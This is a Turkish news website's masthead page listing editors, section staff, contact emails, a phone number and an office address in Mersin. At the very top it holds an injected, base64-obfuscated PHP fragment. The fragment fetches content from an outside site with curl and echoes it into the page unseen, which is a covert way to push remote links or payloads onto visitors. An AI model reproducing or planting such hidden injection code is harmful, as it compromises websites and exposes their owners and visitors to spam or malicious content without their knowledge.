'.base64_decode('PD9waHANCiRjaCA9IGN1cmxfaW5pdCgpOyAvLyANCmN1cmxfc2V0b3B0KCAkY2ggLCBDVVJMT1BUX1VSTCAsICJodHRwOi8vd3d3Lm1hbGF0eWFsaW1pdC5jb20vbGluay5waHAiICk7IC8vIA0KY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLCB0cnVlKTsNCiR2ZXJpID0gY3VybF9leGVjKCRjaCk7IC8vIA0KY3VybF9jbG9zZSgkY2gpOyAvLyANCmVjaG8gJHZlcmk7IC8vICANCj8+')); ?>

Künye

Genel Yayın Yönetmeni ve Sorumlu Yazı İşleri Müdürü
Tuğrul  DEMİR
Telefon: 0 532 061 1452
E-posta: vsagdic@gmail.com
Haber Müdürü
Selim KURTCAN
Selim@internet-haberler.com

SİYASET
Haldun Okdemir
Haldun@internet-haberler.com
GÜNDEM
Serkan PORTEL
Serkan@internet-haberler.com
DÜNYA
Mahmut Görgen
Mahmut@internet-haberler.com
SPOR
Vadi Sağdıç
Vadi@internet-haberler.com


HUKUK DENIŞMANI
Av.A.Erdem Akyüz
erdemak@gmail.com

GECE EDİTÖRÜ
Nehir Kalmaz
Nehir@internet-haberler.com

REKLAM
Vadi SAĞDIÇ 
Vadi@Haberlermersin.com


FACEBOOK
https://www.facebook.com/interrhaber/

TWITTER


İLETİŞİM
Adres: Cumhuriyet Mah 1612 Sok no 3 Yenişehir MERSİN
Telefon: 0 532 061 1452
E-posta: vsagdic@gmail.com


VERGİ NO  : Liman /8796588412
 
Yukarı Çık